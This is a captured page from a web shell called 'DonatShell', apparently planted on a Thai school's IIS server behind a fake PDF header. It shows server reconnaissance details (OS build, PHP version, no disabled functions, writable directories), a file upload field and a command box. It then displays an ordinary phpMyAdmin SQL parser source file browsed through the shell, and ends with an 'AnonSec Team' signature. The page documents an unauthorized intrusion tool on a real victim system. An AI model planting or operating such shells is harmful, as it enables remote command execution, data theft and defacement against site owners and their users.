%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : www.kowitt.ac.th  /  Your IP : 216.73.216.118
Web Server : Microsoft-IIS/7.5
System : Windows NT SERVER02 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586
User : IUSR ( 0)
PHP Version : 5.6.31
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /BK/wwwroot/phpMyAdmin/libraries/sql-parser/src/Statements/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /BK/wwwroot/phpMyAdmin/libraries/sql-parser/src/Statements/ShowStatement.php
<?php

/**
 * `SHOW` statement.
 *
 * @package    SqlParser
 * @subpackage Statements
 */
namespace SqlParser\Statements;

/**
 * `SHOW` statement.
 *
 * @category   Statements
 * @package    SqlParser
 * @subpackage Statements
 * @author     Dan Ungureanu <udan1107@gmail.com>
 * @license    http://opensource.org/licenses/GPL-2.0 GNU Public License
 */
class ShowStatement extends NotImplementedStatement
{

    /**
     * Options of this statement.
     *
     * @var array
     */
    public static $OPTIONS = array(
        'CREATE'                        => 1,
        'AUTHORS'                       => 2,
        'BINARY'                        => 2,
        'BINLOG'                        => 2,
        'CHARACTER'                     => 2,
        'CODE'                          => 2,
        'COLLATION'                     => 2,
        'COLUMNS'                       => 2,
        'CONTRIBUTORS'                  => 2,
        'DATABASE'                      => 2,
        'DATABASES'                     => 2,
        'ENGINE'                        => 2,
        'ENGINES'                       => 2,
        'ERRORS'                        => 2,
        'EVENT'                         => 2,
        'EVENTS'                        => 2,
        'FUNCTION'                      => 2,
        'GRANTS'                        => 2,
        'HOSTS'                         => 2,
        'INDEX'                         => 2,
        'INNODB'                        => 2,
        'LOGS'                          => 2,
        'MASTER'                        => 2,
        'OPEN'                          => 2,
        'PLUGINS'                       => 2,
        'PRIVILEGES'                    => 2,
        'PROCEDURE'                     => 2,
        'PROCESSLIST'                   => 2,
        'PROFILE'                       => 2,
        'PROFILES'                      => 2,
        'SCHEDULER'                     => 2,
        'SET'                           => 2,
        'SLAVE'                         => 2,
        'STATUS'                        => 2,
        'TABLE'                         => 2,
        'TABLES'                        => 2,
        'TRIGGER'                       => 2,
        'TRIGGERS'                      => 2,
        'VARIABLES'                     => 2,
        'VIEW'                          => 2,
        'WARNINGS'                      => 2,
    );
}

Anon7 - 2022
AnonSec Team